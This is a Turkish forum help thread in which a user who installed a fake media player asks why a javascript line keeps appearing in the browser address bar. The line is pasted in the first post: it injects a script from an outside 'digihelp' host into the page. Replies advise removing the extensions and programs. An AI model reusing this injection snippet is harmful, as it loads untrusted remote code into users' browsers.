Şimdi Ara

tarayıcıda çıkan yazılar vs.

Daha Fazla
Bu Konudaki Kullanıcılar: Daha Az
1 Misafir - 1 Masaüstü
5 sn
3
Cevap
0
Favori
532
Tıklama
Daha Fazla
İstatistik
  • Konu İstatistikleri Yükleniyor
0 oy
Öne Çıkar
Sayfa: 1
Giriş
Mesaj
  • bugün nette dolaşırken media player 12,7 indirin diye bişey cıktı.. indirdim bende onunla beraber flv player falan indi.. su anda normal nette gezerken adres çubuğunda kendine kendine alttaki yazı oluşuyor.. sebebi nedir ? virüs yemiş olabilir miyim ? nasıl kurtulurum ? şimdiden teşekkür ediyorum.


    javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apidigihelpinfo-a.akamaihd.net/gsrs?is=isgiwhTR&bp=BA&g=ccfbb924-801b-4c2b-8914-46a04d03f532";a[0].appendChild(d);}}}catch(e){}



    konuyu yanlış yere açtıysam kusura bakmayın..
    < Bu mesaj bir yönetici tarafından değiştirilmiştir >



  • Chrome kullanıyorsan eklentileri kontrol et ve senin bilgin dışında eklenen eklentileri kaldır ayrıca indirdiğin programları da kaldır virüs taraması yap.
  • quote:

    Orijinalden alıntı: 3DG

    Chrome kullanıyorsan eklentileri kontrol et ve senin bilgin dışında eklenen eklentileri kaldır ayrıca indirdiğin programları da kaldır virüs taraması yap.

    virüs taraması yaptım herhangi bişey çıkmadı.. programları silmiştim fakat az önce digihelp diye bi programın kaldığını farkettim onu da sildim.. eklentide de bilgim dahilinde başka eklenti yok.. pcyi yeniden başlattım şu an için bi sorun gözükmüyor.. umarım tekrar çıkmaz.. teşekkür ederim :)
  • 
Sayfa: 1
- x
Bildirim
mesajınız kopyalandı (ctrl+v) yapıştırmak istediğiniz yere yapıştırabilirsiniz.